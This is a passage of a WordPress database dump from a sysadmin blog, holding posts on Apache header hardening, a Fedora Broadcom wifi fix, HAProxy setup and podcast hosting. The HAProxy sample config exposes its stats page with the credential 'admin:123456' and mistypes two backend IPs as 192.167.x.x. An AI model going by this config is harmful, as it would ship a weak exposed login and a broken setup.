-->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header set X-Content-Type-Options nosniff</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Don\'t forget to restart Apache HTTPD service after these changes. Good Luck!</p>\n<!-- /wp:paragraph -->','How to make Apache HTTPD Web Server more secure','','publish','open','open','','how-to-make-apache-web-server-more-secure','','','2023-05-02 17:00:04','2023-05-02 17:00:04','',0,'http://ictbank.ir/blog/?p=305',0,'post','',0),
(306,2,'2020-03-31 09:17:48','2020-03-31 09:17:48','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>DENY: It completely denies to be loaded in frame/iframe.</li><li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li><li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','How to make Apache Web Server more secure','','inherit','closed','closed','','305-revision-v1','','','2020-03-31 09:17:48','2020-03-31 09:17:48','',305,'http://ictbank.ir/blog/index.php/2020/03/31/305-revision-v1/',0,'revision','',0),
(307,2,'2020-03-31 09:39:29','2020-03-31 09:39:29','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>DENY: It completely denies to be loaded in frame/iframe.</li><li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li><li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3.<strong>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>with this vulnerability there is a possibility to execute style sheet and steal content from another site through content type doesn’t match (read more: https://geekflare.com/secure-mime-types-in-apache-nginx-with-x-content-type-options/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header set X-Content-Type-Options nosniff</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Don\'t forget to restart Apache service after these changes. Good Luck!</p>\n<!-- /wp:paragraph -->','How to make Apache Web Server more secure','','inherit','closed','closed','','305-revision-v1','','','2020-03-31 09:39:29','2020-03-31 09:39:29','',305,'http://ictbank.ir/blog/index.php/2020/03/31/305-revision-v1/',0,'revision','',0),
(312,2,'2020-11-03 12:05:02','2020-11-03 12:05:02','<!-- wp:paragraph -->\n<p>I am using Fedora workstation as my main OS on my laptop for many years, but usually I face a problem with my wifi device when I try to update my OS or change it. So, here is a solution to fix the problem:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First, you have to determine your wifi device model by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">lspci -k | grep Network</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>The result should be something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">03:00.0 Network controller: Broadcom Inc. and subsidiaries BCM4313 802.11bgn Wireless Network Adapter (rev 01)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>So, you have to enable rpmfusion repository:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">dnf install https://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-$(rpm -E %fedora).noarch.rpm https://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-$(rpm -E %fedora).noarch.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then install Broadcom Wireless b43 Driver firmware on Fedora Linux:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">dnf install kmod-wl</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then reboot your system and enjoy your wifi device.</p>\n<!-- /wp:paragraph -->','Fedora 33: Problem with Broadcom Wifi Device','','publish','open','open','','fedora-33-problem-with-broadcom-wifi-device','','','2023-05-02 14:19:25','2023-05-02 14:19:25','',0,'http://ictbank.ir/blog/?p=312',0,'post','',0),
(313,2,'2020-11-03 12:05:02','2020-11-03 12:05:02','<!-- wp:paragraph -->\n<p>I am using Fedora workstation as my main OS on my laptop for many years, but usually I face a problem with my wifi device when I try to update my OS or change it. So, here is a solution to fix the problem:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First, you have to determine your wifi device model by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">lspci -k | grep Network</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>The result should be something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">03:00.0 Network controller: Broadcom Inc. and subsidiaries BCM4313 802.11bgn Wireless Network Adapter (rev 01)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>So, you have to enable rpmfusion repository:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">dnf install https://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-$(rpm -E %fedora).noarch.rpm https://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-$(rpm -E %fedora).noarch.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then install Broadcom Wireless b43 Driver firmware on Fedora Linux:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">dnf install kmod-wl</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then reboot your system and enjoy your wifi device.</p>\n<!-- /wp:paragraph -->','Fedora 33: Problem with Broadcom Wifi Device','','inherit','closed','closed','','312-revision-v1','','','2020-11-03 12:05:02','2020-11-03 12:05:02','',312,'http://ictbank.ir/blog/index.php/2020/11/03/312-revision-v1/',0,'revision','',0),
(316,2,'2020-11-16 12:21:50','2020-11-16 12:21:50','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','inherit','closed','closed','','104-revision-v1','','','2020-11-16 12:21:50','2020-11-16 12:21:50','',104,'http://ictbank.ir/blog/index.php/2020/11/16/104-revision-v1/',0,'revision','',0),
(323,2,'2020-12-26 11:24:15','2020-12-26 11:24:15','<a href=\"http://ictbank.ir/blog/wp-content/uploads/2020/12/Oracle_Core__Essential_Internals_for_DBAs_and_Developers.pdf\">Oracle Core Essential Internals for DBAs and Developers</a>','Oracle Core Essential Internals for DBAs and Developers','','publish','open','closed','','oracle_core_essential_internals_for_dbas_and_developers','','','2020-12-26 11:25:23','2020-12-26 11:25:23','',0,'http://ictbank.ir/blog/?post_type=product&p=323',0,'product','',0),
(324,2,'2020-12-26 11:22:20','2020-12-26 11:22:20','','__Oracle_Core__Essential_Internals_for_DBAs_and_Developers','','inherit','open','closed','','__oracle_core__essential_internals_for_dbas_and_developers','','','2020-12-26 11:22:20','2020-12-26 11:22:20','',323,'http://ictbank.ir/blog/wp-content/uploads/2020/12/Oracle_Core__Essential_Internals_for_DBAs_and_Developers.pdf',0,'attachment','application/pdf',0),
(325,1,'2020-12-27 06:43:33','2020-12-27 06:43:33','','Order – December 27, 2020 @ 06:43 AM','','wc-cancelled','open','closed','wc_order_nqe3g137fsadu','order-dec-27-2020-0643-am','','','2020-12-27 08:20:08','2020-12-27 08:20:08','',0,'http://ictbank.ir/blog/?post_type=shop_order&p=325',0,'shop_order','',0),
(326,1,'2020-12-28 06:45:00','2020-12-28 06:45:00','','Order – December 28, 2020 @ 06:45 AM','','wc-cancelled','open','closed','wc_order_WAHrBuxZQbmu2','order-dec-28-2020-0645-am','','','2020-12-28 08:20:51','2020-12-28 08:20:51','',0,'http://ictbank.ir/blog/?post_type=shop_order&p=326',0,'shop_order','',0),
(329,2,'2021-02-06 14:42:41','2021-02-06 14:42:41','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','publish','open','open','','hosting-a-podcast','','','2023-05-02 14:17:59','2023-05-02 14:17:59','',0,'http://ictbank.ir/blog/?p=329',0,'post','',0),
(330,2,'2021-02-06 13:24:35','2021-02-06 13:24:35','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item 